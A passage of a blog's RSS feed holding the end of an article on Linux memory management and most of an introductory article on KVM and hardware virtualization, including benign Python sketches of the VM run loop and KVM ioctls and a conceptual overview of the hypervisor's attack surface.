To keep track of which those are, the kernel files pages on &lt;strong&gt;LRU (Least Recently Used) lists&lt;/strong&gt;: an &lt;em&gt;active&lt;/em&gt; list for pages in regular use, and an &lt;em&gt;inactive&lt;/em&gt; list for pages that have gone cold. A page that stops being touched slowly drifts from active to inactive, and the inactive list is exactly where kswapd goes shopping for things to evict. (It keeps separate lists for anonymous memory and for file-backed page-cache pages, since the two are reclaimed in different ways. The kernel can also be built to use &lt;strong&gt;Multi-Gen LRU&lt;/strong&gt;, which sorts pages into several finer-grained &lt;em&gt;generations&lt;/em&gt; by age, but the goal is the same: find the coldest pages.)&lt;/p&gt;&lt;p&gt;Once kswapd picks a cold page, what happens next depends on what kind of page it is:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;A clean file-backed page&lt;/strong&gt; — just drop it. The original is still sitting on disk, so it can be read back later if anyone needs it.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;A dirty file-backed page&lt;/strong&gt; — write the changes back to disk first, &lt;em&gt;then&lt;/em&gt; drop it.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;An anonymous page&lt;/strong&gt; (heap or stack — nothing on disk to fall back on) — ship it off to the annex: write it out to swap, leave a note in the page-table entry saying “this one’s at the annex,” and free the page.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Later, if a process reaches for a page that got shipped off to swap, it simply faults. The librarian spots the “at the annex” note, &lt;code&gt;do_swap_page()&lt;/code&gt; fetches the page back from disk, and the program carries on none the wiser — just a little slower for that one access.&lt;/p&gt;&lt;p&gt;And if even swap fills up and there’s truly nothing left to reclaim? The library’s last resort is to throw a reader out completely. 
That’s the &lt;strong&gt;OOM (Out-Of-Memory) killer&lt;/strong&gt; (&lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/mm/oom_kill.c&quot;&gt;&lt;code&gt;mm/oom_kill.c&lt;/code&gt;&lt;/a&gt;): it looks over the killable processes, scores them mostly by memory footprint while respecting policy knobs like &lt;code&gt;oom_score_adj&lt;/code&gt;, and kills the worst candidate. It’s brutal, but losing one process beats the whole machine locking up.&lt;/p&gt;&lt;p&gt;That’s the kernel reclaiming memory under duress. Most of the time, though, memory is handed back far more peacefully — by the programs that asked for it in the first place.&lt;/p&gt;&lt;h2&gt;Freeing Memory: Returning Pages to the Pool&lt;/h2&gt;&lt;p&gt;Here’s the surprise: calling &lt;code&gt;free()&lt;/code&gt; usually doesn’t return anything to the kernel — the C library just keeps it in its own free-list to reuse for your next &lt;code&gt;malloc()&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;Pages only really go back when a whole region is torn down (a &lt;code&gt;munmap()&lt;/code&gt;, or the process exiting). Even then, a page is freed only once the &lt;em&gt;last&lt;/em&gt; user lets go — its reference count hits zero — because copy-on-write and shared mappings mean several processes can point at the same page. When that count reaches zero, the page returns to the buddy allocator, ready to be handed out again.&lt;/p&gt;&lt;p&gt;That’s every piece of the machine on its own. The best way to make them stick is to watch them work together — so let’s trace, step by step, what happens behind a few ordinary lines of C.&lt;/p&gt;&lt;h2&gt;End-to-End: From &lt;code&gt;malloc()&lt;/code&gt; to First Write&lt;/h2&gt;&lt;p&gt;We’ll start with the simplest thing of all: allocate some memory and write to it.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;code&gt;malloc(4096)&lt;/code&gt;.&lt;/strong&gt; Remember that &lt;code&gt;malloc&lt;/code&gt; lives in the C library, not the kernel. 
If the C library already has spare space in its own heap, it may not call the kernel at all. But when it does need more room, it asks the kernel for raw address space (with &lt;code&gt;brk()&lt;/code&gt; or &lt;code&gt;mmap()&lt;/code&gt;), and the normal response is cheap: the kernel extends or adds an anonymous &lt;strong&gt;VMA&lt;/strong&gt; — a promise covering that range of addresses. No physical memory is touched yet. So when &lt;code&gt;malloc&lt;/code&gt; hands back &lt;code&gt;buf&lt;/code&gt;, the address is valid but may have &lt;strong&gt;nothing behind it&lt;/strong&gt;: no page-table entry, no physical page.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;code&gt;buf[0] = &amp;#39;A&amp;#39;&lt;/code&gt;.&lt;/strong&gt; Now you write, and that’s when the promise gets cashed in. The CPU asks the MMU to translate the address, the MMU walks the page tables, finds no entry there — and raises a &lt;strong&gt;page fault&lt;/strong&gt;. That rings the bell for the librarian: the fault handler finds the VMA covering the address, confirms it’s writable, and sees this is a fresh anonymous page that needs filling in. So it grabs a free page from the buddy allocator, often through the per-CPU cache, wipes it clean, and installs a page-table entry pointing at it.&lt;/p&gt;&lt;p&gt;The faulting instruction restarts, and this time the translation succeeds — &lt;code&gt;&amp;#39;A&amp;#39;&lt;/code&gt; lands on the shelf. Every later access to that page sails straight through the TLB and costs nothing extra. That’s &lt;strong&gt;demand paging&lt;/strong&gt;: the page was just a promise until the exact moment you touched it.&lt;/p&gt;&lt;p&gt;Allocating and writing is the simple case. 
It gets more interesting when a process forks and parent and child end up sharing memory.&lt;/p&gt;&lt;h2&gt;End-to-End: &lt;code&gt;fork()&lt;/code&gt; and Copy-on-Write&lt;/h2&gt;&lt;p&gt;When &lt;code&gt;fork()&lt;/code&gt; is called, the child gets a copy of the parent’s address space — but, as we saw, the kernel doesn’t actually copy the memory. Instead it points the child’s page tables at the &lt;strong&gt;same physical pages&lt;/strong&gt; the parent is using, and marks every writable private page &lt;strong&gt;read-only&lt;/strong&gt; in both. As long as both processes only read, they share the same books happily, with no faults at all.&lt;/p&gt;&lt;p&gt;The moment the child writes, the trap springs. &lt;code&gt;buf[0] = &amp;#39;B&amp;#39;&lt;/code&gt; lands on a read-only page, so the CPU raises a &lt;strong&gt;protection fault&lt;/strong&gt;. The librarian recognizes this as &lt;strong&gt;copy-on-write&lt;/strong&gt;: it grabs a fresh page from the buddy allocator, photocopies the parent’s page into it (still holding &lt;code&gt;&amp;#39;A&amp;#39;&lt;/code&gt;), repoints the child’s page-table entry at the copy, and makes it writable again. It also drops one reference on the original, since the parent still holds it.&lt;/p&gt;&lt;p&gt;Now each side has its own page — the parent’s untouched with &lt;code&gt;&amp;#39;A&amp;#39;&lt;/code&gt;, the child’s a private copy with &lt;code&gt;&amp;#39;B&amp;#39;&lt;/code&gt;. Only the single page that was actually written ever got duplicated.&lt;/p&gt;&lt;p&gt;Anonymous memory is only half the story. Mapping a &lt;em&gt;file&lt;/em&gt; into the address space runs the same machinery with one twist: where the page comes from.&lt;/p&gt;&lt;h2&gt;End-to-End: &lt;code&gt;mmap()&lt;/code&gt; a File&lt;/h2&gt;&lt;p&gt;With an ordinary lazy file mapping, &lt;code&gt;mmap()&lt;/code&gt; does almost nothing up front, just like &lt;code&gt;malloc&lt;/code&gt;. 
The kernel creates a &lt;strong&gt;VMA&lt;/strong&gt; for the range — but this time it labels it with &lt;em&gt;which file&lt;/em&gt; backs it: “the books here come from &lt;code&gt;data.bin&lt;/code&gt;.” The address &lt;code&gt;p&lt;/code&gt; comes back right away, with no I/O and no page allocated yet.&lt;/p&gt;&lt;p&gt;The first read, &lt;code&gt;p[0]&lt;/code&gt;, faults — the same bell as always. The only difference is what the librarian does about it. Instead of handing back a blank page, it sees the VMA is file-backed and fetches the right page from the file: it reads it from the &lt;strong&gt;page cache&lt;/strong&gt; (the kernel’s in-memory copy of recently-used file data), or from disk if it isn’t cached yet. That page gets wired into a page-table entry, and the read completes.&lt;/p&gt;&lt;p&gt;What happens on a &lt;em&gt;write&lt;/em&gt; depends on how you mapped the file, assuming the mapping was created with &lt;code&gt;PROT_WRITE&lt;/code&gt;. With &lt;code&gt;MAP_PRIVATE&lt;/code&gt; the page starts out protected from direct modification, so writing to it triggers a &lt;strong&gt;copy-on-write&lt;/strong&gt; fault — the page is photocopied to a private page and your change goes to the copy, leaving the file untouched. With &lt;code&gt;MAP_SHARED&lt;/code&gt;, writes land directly in the page cache, and the kernel writes those dirty pages back to the file later on.&lt;/p&gt;&lt;p&gt;With those three traces, we’ve watched every piece of the machine work together. Here’s the whole picture in one place.&lt;/p&gt;&lt;h2&gt;Summary&lt;/h2&gt;&lt;p&gt;Let’s put the library back together. Every address a program uses is virtual, and the &lt;strong&gt;MMU&lt;/strong&gt; translates it on every access by walking the process’s &lt;strong&gt;page tables&lt;/strong&gt; (up to five levels, rooted at &lt;code&gt;CR3&lt;/code&gt;), with hot translations cached in the &lt;strong&gt;TLB&lt;/strong&gt;. 
Underneath, each 4 KB page has a &lt;code&gt;struct page&lt;/code&gt; record; pages are sorted into &lt;strong&gt;zones&lt;/strong&gt; and &lt;strong&gt;NUMA nodes&lt;/strong&gt;, and the &lt;strong&gt;buddy allocator&lt;/strong&gt; hands them out in power-of-two runs, fronted by a per-CPU cache that avoids the zone lock in the common case. On top of it, the kernel’s own allocators carve pages up further — SLUB lines a page with same-sized objects (one shelf, many identical books) for its tiny internal structures, while vmalloc stitches scattered pages into one contiguous virtual range.&lt;/p&gt;&lt;p&gt;User space gets its own view: an &lt;code&gt;mm_struct&lt;/code&gt; with a tree of &lt;strong&gt;VMAs&lt;/strong&gt;, each a labeled range of addresses. VMAs are just promises, though — real pages appear only when the program touches an address and trips a &lt;strong&gt;page fault&lt;/strong&gt;, where the librarian provides a blank page, reads one from a file, or photocopies a shared one (&lt;strong&gt;copy-on-write&lt;/strong&gt;). This &lt;strong&gt;demand paging&lt;/strong&gt; is what lets a process reserve gigabytes while consuming only what it touches. Memory flows back the same way: under pressure &lt;strong&gt;kswapd&lt;/strong&gt; ages pages through LRU lists and reclaims the coldest ones, dropping file-cache pages or pushing anonymous pages to &lt;strong&gt;swap&lt;/strong&gt;, with the &lt;strong&gt;OOM killer&lt;/strong&gt; as last resort; otherwise a page returns to the buddy allocator once its region is gone and its last reference drops.&lt;/p&gt;&lt;p&gt;That’s the memory manager: one mechanism giving every process its own private, lazily-filled view of a finite pile of physical RAM. The next article turns to the part of the kernel that decides &lt;em&gt;who gets to run, and when&lt;/em&gt; — the &lt;strong&gt;scheduler&lt;/strong&gt;.&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Exploring NVIDIA Linux Drivers Internals Basics &amp; IOCTLs</title>
<link>https://fuzzinglabs.com/exploring-nvidia-linux-drivers-internals-basics-ioctls/</link>
<guid isPermaLink="false">J0Z6eCusZ3LqFt1qS3wEauCV3XkZOHJ01lF7ww==</guid>
<pubDate>Tue, 23 Jun 2026 21:58:27 +0000</pubDate>
<description>Exploring Linux &amp; NVIDIA Drivers NVIDIA Linux Drivers Internals Basics Introduction In this post we will talk about nvidia’s open source linux drivers internals and basic concepts. Back in 2022, NVIDIA released its drivers as open source, and for the security and tech community in general, this is good news; this allows us to understand...</description>
<content:encoded>Exploring Linux &amp;amp; NVIDIA Drivers NVIDIA Linux Drivers Internals Basics Introduction In this post we will talk about nvidia’s open source linux drivers internals and basic concepts. Back in 2022, NVIDIA released its drivers as open source, and for the security and tech community in general, this is good news; this allows us to understand...</content:encoded>
</item>
<item>
<title>Introduction To KVM &amp; Hardware Virtualization</title>
<link>https://fuzzinglabs.com/introduction-to-kvm-hardware-virtualization/</link>
<enclosure type="image/jpeg" length="0" url="https://fuzzinglabs.com/wp-content/uploads/2025/08/image-12.png"></enclosure>
<guid isPermaLink="false">JoXiUdrWYCM9zq5xaLirXBEmWVwAmMJIBQ4F_A==</guid>
<pubDate>Tue, 23 Jun 2026 21:58:27 +0000</pubDate>
<description>Step into virtualization with KVM. This guide introduces hypervisors and explores the unique architecture and security of the Linux kernel.</description>
<content:encoded>&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Virtualization has become a huge part of production environments, whether in traditional IT or in the cloud, improving security, development cycles and maintenance. This technology is the cornerstone that allows us to build isolated sandboxes, drastically shorten the time it takes to provision new servers, and perform hardware maintenance with zero downtime through live migration. It also creates a whole new attack surface, which we introduce in this post.&lt;/p&gt;&lt;p&gt;At the heart of this capability lies the hypervisor, the software that creates and manages virtual machines. In the vast ecosystem powered by Linux, one solution stands out for its deep integration and performance: KVM. As a core feature of the Linux kernel itself, KVM effectively turns the operating system into a powerful, native hypervisor, establishing it as a foundational building block for a majority of today’s cloud platforms and virtualized data centers.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;Hypervisors and their different types&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;A hypervisor, or Virtual Machine Monitor (VMM), is the software that creates and runs virtual machines. There are two main types of hypervisors:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;Type 1 (Bare-Metal) Hypervisors&lt;/strong&gt;: These run directly on the host’s hardware, acting as a lightweight operating system. They have direct access to the system’s resources and are generally more performant and secure. Examples include VMware ESXi, and Microsoft Hyper-V.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Type 2 (Hosted) Hypervisors&lt;/strong&gt;: These run as an application on top of a conventional operating system. They are easier to set up and manage but introduce more overhead as they have to go through the host OS to access the hardware. Examples include VMware Workstation, Oracle VirtualBox, and QEMU.&lt;/li&gt;&lt;/ul&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
												&lt;figure&gt;
										&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2025/08/kvm1-1024x422.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;											&lt;figcaption&gt;Two types of Hypervisors, from Saferwall blog&lt;/figcaption&gt;
										&lt;/figure&gt;
									&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;These two categories are not sharply defined: KVM, being part of the Linux kernel, sits somewhere between the two, a sort of type one and a half hypervisor. Note also that VMware Workstation and VirtualBox load modules into the kernel, so they could be considered type one and three quarters hypervisors.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;A Brief View of Virtualization techniques&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h3&gt;1- Full Binary Emulation&lt;/h3&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Full Binary Emulation is a powerful virtualization method that allows a host system to run a completely unmodified guest operating system, even one from a different CPU architecture.&lt;/p&gt;&lt;p&gt;The process is called Binary Translation (BT), where the emulator dynamically translates blocks of guest machine code (e.g., ARM) into instructions the host CPU (e.g., x86-64) can execute. This technique offers a strong security advantage: the entire guest environment runs inside a single, unprivileged userspace process on the host. Its main drawback is its slowness.&lt;/p&gt;&lt;p&gt;Its ability to run cross-architecture code remains its defining feature. This technology is central to modern tools like QEMU, which uses its TCG IR (Intermediate Representation) for this translation.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
												&lt;figure&gt;
										&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2025/08/kvm2.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;											&lt;figcaption&gt;QEMU TCG Diagram from curiouslearnerblog&lt;/figcaption&gt;
										&lt;/figure&gt;
									&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h3&gt;2- Paravirtualization&lt;/h3&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;To overcome the performance limitations of full emulation, paravirtualization was introduced.&lt;/p&gt;&lt;p&gt;This technique requires modifying the guest operating system’s kernel to make it aware that it is running in a virtualized environment. By doing so, the guest can directly communicate with the hypervisor, eliminating the need for complex emulation of hardware devices. VirtIO is a standard for paravirtualized devices, providing a set of common features for network, block, and other devices. vhost is a kernel-level backend for VirtIO that further improves performance by moving the VirtIO backend into the host kernel. You can dive deeper into paravirtualization with &lt;a href=&quot;https://www.redhat.com/en/blog/virtio-devices-and-drivers-overview-headjack-and-phone&quot;&gt;this Red Hat article&lt;/a&gt;.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
												&lt;figure&gt;
										&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2025/08/kvm3.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;											&lt;figcaption&gt;VirtIO blogpost from RedHat&lt;/figcaption&gt;
										&lt;/figure&gt;
									&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h3&gt;3- Hardware Virtualization&lt;/h3&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;The real game-changer for virtualization was the introduction of hardware support from CPU vendors.&lt;/p&gt;&lt;p&gt;The idea is to move security boundaries from software to the CPU itself (hence hardware-assisted virtualization), so that the guest runs directly on the CPU and achieves near-native speeds. The hypervisor’s role is reduced to managing the virtual machines and providing them with access to the physical hardware.&lt;/p&gt;&lt;p&gt;Intel’s VT (technical name VMX) and AMD’s AMD-V (technical name SVM) are sets of x86 processor extensions that enable secure hardware-assisted virtualization. ARM also provides virtualization extensions in its architecture. This technology significantly improves performance and allows for the virtualization of unmodified operating systems, including proprietary ones like Windows.&lt;/p&gt;&lt;p&gt;The introduction of additional hardware features, such as the IOMMU or TDP (generic term for two-dimensional paging, or nested paging: EPT for Intel, NPT for AMD), brought performance even closer to native.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;Hardware virtualization overview&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Note: This section mentions CPU features such as MSRs, MMIO and APICs. If you are not familiar with these topics and would like to read up on them, you may enjoy Ayoub Faouzi’s &lt;a href=&quot;https://github.com/ayoubfaouzi/cpu-internals&quot;&gt;CPU Internals&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;Let’s give a generic overview of how the VM running loop works on the hardware side. Although the vocabulary I’ll be using might change depending on the implementation (AMD, Intel, ARM), the ideas pretty much stay the same.&lt;/p&gt;&lt;p&gt;The kernel (virtualization instructions are privileged) asks the CPU to run a VM, after first preparing the data needed to run it.&lt;/p&gt;&lt;p&gt;The CPU performs a “VMENTER”, and the VM runs on the raw CPU, but in its own “world” (different address space, etc.), until it tries to execute an instruction that could break a security boundary (accessing a non-existent address, changing an MSR, addressing MMIO/PIO, etc.).&lt;/p&gt;&lt;p&gt;When such an event happens, the CPU performs a VMEXIT and returns to the hypervisor, providing it with the VMEXIT reason and additional data. The hypervisor is responsible for resolving this exception however it sees fit (emulate the instruction, pass the MMIO access to QEMU to let it emulate a network card, create a new address range for the VM, etc.).&lt;/p&gt;&lt;p&gt;Once the exception has been resolved, another VMENTER can be performed, resuming the VM’s execution. To the VM, it seems nothing happened and the instruction executed correctly.&lt;/p&gt;								&lt;/div&gt;
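&lt;p&gt;The enter/exit cycle described above can be sketched as a toy model in Python. This is not how a real hypervisor is written: the generator standing in for the guest, the exit-reason strings and the value returned by the MSR handler are all hypothetical, chosen only to show the control flow (run the guest, stop on an exit, handle it, resume).&lt;/p&gt;

```python
def toy_guest():
    """Hypothetical guest: every yield models a VMEXIT, every send() a VMENTER."""
    efer = yield ("msr_read", 0xC0000080)    # 0xC0000080 is the EFER MSR
    yield ("mmio_write", 0xFEE00000, efer)   # write the value to an MMIO address
    yield ("halt",)


def run_vm(guest):
    """Toy hypervisor loop: enter the guest, handle each exit, then re-enter."""
    handled = []
    exit_info = guest.send(None)             # first VMENTER
    while exit_info[0] != "halt":
        reason = exit_info[0]
        if reason == "msr_read":
            result = 0x500                   # made-up emulated MSR value
        elif reason == "mmio_write":
            result = None                    # a real VMM would forward this to a device model
        else:
            raise ValueError("unhandled exit reason: " + reason)
        handled.append(reason)
        exit_info = guest.send(result)       # VMENTER again; the guest resumes transparently
    return handled
```

&lt;p&gt;Calling &lt;code&gt;run_vm(toy_guest())&lt;/code&gt; returns the list of exit reasons that were handled. From the guest’s point of view each intercepted operation simply completes, which is the transparency property described above.&lt;/p&gt;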
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h3&gt;Getting into x86 &amp;amp; AMD’s SVM specifics&lt;/h3&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;So far, we have been largely architecture-independent. We will now dive into the x86 AMD implementation (although Intel’s is pretty close to AMD’s).&lt;/p&gt;&lt;p&gt;AMD’s AMD-V extension provides several instructions to work with virtualization. Among them is VMRUN, the instruction that performs the VMENTER. It expects in RAX the physical address of the VMCB, a 0x1000-byte structure created by the hypervisor that holds the configuration of the VM (Intel’s counterpart, the VMCS, has an opaque layout and is accessed through the VMREAD/VMWRITE instructions).&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
												&lt;figure&gt;
										&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2025/08/kvm4.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;											&lt;figcaption&gt;A piece of the VMCB, as defined in arch/x86/include/asm/svm.h&lt;/figcaption&gt;
										&lt;/figure&gt;
									&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;In the VMCB, notable fields are:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Intercept vectors: tell the CPU whether a specific instruction must be intercepted and result in a VMEXIT&lt;/li&gt;&lt;li&gt;Exit info: filled in by the CPU on VMEXIT to inform the hypervisor of the cause of the VMEXIT&lt;/li&gt;&lt;li&gt;VM registers: the registers of the vCPU, updated by the CPU upon VMEXIT&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;SVM (Secure Virtual Machine, the technical name of AMD-V) also provides MSRs (Model Specific Registers) to configure the extension. Among them, a bit in &lt;code&gt;EFER&lt;/code&gt; enables the virtualization extension, and the &lt;code&gt;VM_HSAVE_PA&lt;/code&gt; MSR, according to the AMD manual,&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;holds the physical address of a 4KB block of memory where VMRUN saves host state, and from which #VMEXIT reloads host state. The VMM software is expected to set up this register before issuing the first VMRUN instruction.&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;If you want more detail about the VMCB layout, or want to explore the technology in more depth, you can find it in the AMD64 Manual, Vol. 2, under &lt;code&gt;Appendix B VMCB Layout&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;Note: if you’d rather dive into Intel’s implementation, you can check out daax’s &lt;a href=&quot;https://revers.engineering/7-days-to-virtualization-a-series-on-hypervisor-development/&quot;&gt;7 Days to Virtualization: A Series on Hypervisor Development&lt;/a&gt;.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;The Linux Hypervisor : KVM&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;KVM (Kernel-based Virtual Machine) is the Linux kernel’s hypervisor, meaning it is integrated into the Linux kernel. Unlike Hyper-V with VBS on Windows, however, it does not run the host kernel itself inside a virtual machine.&lt;/p&gt;&lt;p&gt;As it is used in the AWS &amp;amp; Google Cloud architectures, and has a very unique attack surface mixing software and hardware, KVM is a very important target to properly secure.&lt;/p&gt;&lt;p&gt;Google for instance is very keen on securing it, providing the &lt;a href=&quot;https://github.com/google/security-research/blob/master/kvmctf/rules.md&quot;&gt;kvmCTF&lt;/a&gt; with a $250,000 reward for a full x86 Intel escape. They are also doing hardening – &lt;a href=&quot;https://cloud.google.com/blog/products/gcp/7-ways-we-harden-our-kvm-hypervisor-at-google-cloud-security-in-plaintext&quot;&gt;7 ways we harden our KVM hypervisor at Google Cloud&lt;/a&gt; – and security research on KVM (Felix Wilhelm’s &lt;a href=&quot;https://googleprojectzero.blogspot.com/2021/06/an-epyc-escape-case-study-of-kvm.html&quot;&gt;An EPYC escape: Case-study of a KVM breakout&lt;/a&gt;).&lt;/p&gt;&lt;h3&gt;Specificity&lt;/h3&gt;&lt;p&gt;KVM is unusual as a hypervisor in that it only provides an API to create VMs. It does not work out of the box: it needs a userland process, the VMM, to manage the VMs. That’s why you’ll often find KVM in your favorite VMM under the “accelerator” option.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
												&lt;figure&gt;
										&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2025/08/kvm5.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;											&lt;figcaption&gt;KVM VM Running Loop&lt;/figcaption&gt;
										&lt;/figure&gt;
									&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;With QEMU as the VMM, the combination is traditionally called QEMU/KVM; it is enabled with the options &lt;code&gt;-cpu host -enable-kvm&lt;/code&gt; and replaces TCG. KVM can also be used through libvirt or as an accelerator for VirtualBox. Cloud providers tend to avoid QEMU/KVM because of its overhead and the huge attack surface of its emulated devices. Amazon, for instance, developed &lt;a href=&quot;https://firecracker-microvm.github.io/&quot;&gt;Firecracker&lt;/a&gt; for efficient and safe microVM management.&lt;/p&gt;
&lt;p&gt;KVM exposes a set of IOCTLs to userland to create and manage virtual machines. Its role is limited to handling the parts of virtualization that require privileged hardware access, and to acting as a bridge between the VMs and the userland VMM.&lt;/p&gt;
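&lt;p&gt;To give a feel for that interface, here is a minimal Python sketch that opens &lt;code&gt;/dev/kvm&lt;/code&gt;, queries the API version, then creates one VM and one vCPU. The helper names &lt;code&gt;kvm_io&lt;/code&gt; and &lt;code&gt;probe_kvm&lt;/code&gt; are made up for this illustration, and the ioctl numbers are computed by hand assuming the x86 encoding of &lt;code&gt;_IO()&lt;/code&gt;; a real VMM would take them from &lt;code&gt;linux/kvm.h&lt;/code&gt; and would go on to set up guest memory and registers before running anything.&lt;/p&gt;

```python
import fcntl
import os

KVMIO = 0xAE  # ioctl "type" byte used by the KVM API


def kvm_io(nr):
    """Argument-less ioctl number, i.e. _IO(KVMIO, nr) as encoded on x86 (assumption)."""
    return KVMIO * 0x100 + nr


KVM_GET_API_VERSION = kvm_io(0x00)  # issued on the /dev/kvm descriptor
KVM_CREATE_VM = kvm_io(0x01)        # issued on /dev/kvm, returns a VM descriptor
KVM_CREATE_VCPU = kvm_io(0x41)      # issued on the VM descriptor, returns a vCPU descriptor


def probe_kvm(path="/dev/kvm"):
    """Return the KVM API version after creating a VM and a vCPU, or None if KVM is unusable."""
    try:
        kvm_fd = os.open(path, os.O_RDWR)
    except OSError:
        return None  # no KVM device, or insufficient permissions
    try:
        version = fcntl.ioctl(kvm_fd, KVM_GET_API_VERSION, 0)
        vm_fd = fcntl.ioctl(kvm_fd, KVM_CREATE_VM, 0)         # machine type 0
        try:
            vcpu_fd = fcntl.ioctl(vm_fd, KVM_CREATE_VCPU, 0)  # vCPU id 0
            os.close(vcpu_fd)
        finally:
            os.close(vm_fd)
        return version
    except OSError:
        return None
    finally:
        os.close(kvm_fd)
```

&lt;p&gt;Calling &lt;code&gt;probe_kvm()&lt;/code&gt; on a host without KVM, or without access to the device node, returns &lt;code&gt;None&lt;/code&gt;. Note the layering: system-wide requests go to the &lt;code&gt;/dev/kvm&lt;/code&gt; descriptor, VM-wide requests to the VM descriptor, and per-vCPU requests to the vCPU descriptor.&lt;/p&gt;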
&lt;h3&gt;Attack surface&lt;/h3&gt;
&lt;p&gt;As with any software, analyzing and reducing the attack surface is paramount to its security. Being “only” an API to create VMs, and not handling hardware emulation or the like (copy-paste, etc.), KVM has an attack surface that is quite small, specific and interesting.&lt;/p&gt;
&lt;p&gt;The usual threat model for a hypervisor assumes that the attacker controls the guest kernel (by being root or by exploiting an LPE). It asks: can the attacker take control of the host from the guest kernel (VM escape)?&lt;/p&gt;
&lt;p&gt;The usual approach is to exploit vulnerabilities in QEMU (the VMM), resulting in a host userland takeover. As mentioned above, AWS has been reducing this surface by creating Firecracker (notably in Rust – but not bug-proof, see this &lt;a href=&quot;https://chomp.ie/Blog+Posts/Attacking+Firecracker+-+AWS&amp;#39;+microVM+Monitor+Written+in+Rust&quot;&gt;chompie article&lt;/a&gt;). However, since KVM itself resides in the kernel, a successful KVM exploit would result in host kernel compromise.&lt;/p&gt;
&lt;p&gt;The VM is allowed to run free, unless a VMEXIT is triggered. When this happens, KVM must react to it to allow the VM to run seamlessly. The attack surface is then all the actions the guest (kernel) could take that would result in a VMEXIT and KVM logic being triggered.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
															&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2025/08/kvm6.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;															&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;One such interaction is the hypercall interface, akin to what syscalls are between userland and kernel-land. In a paravirtualization setup, where the guest is aware that it runs under a hypervisor, it may use (on AMD) the &lt;code&gt;VMMCALL&lt;/code&gt; instruction to perform a hypercall. KVM provides very few hypercalls (&lt;a href=&quot;https://docs.kernel.org/virt/kvm/x86/hypercalls.html&quot;&gt;x86 has 6 active&lt;/a&gt;), so this particular attack surface is very limited. Other examples involve emulated instructions, particular CPU modes (SMM), nested virtualization (to be explored in upcoming blog posts!), MSR accesses, etc.&lt;/p&gt;&lt;p&gt;Note: For the purpose of paravirtualization, KVM returns the signature &lt;code&gt;KVMKVMKVM&lt;/code&gt; in CPUID leaf 0x40000000 to inform the guest that it is running under KVM (see &lt;code&gt;arch/x86/include/uapi/asm/kvm_para.h&lt;/code&gt;).&lt;/p&gt;								&lt;/div&gt;
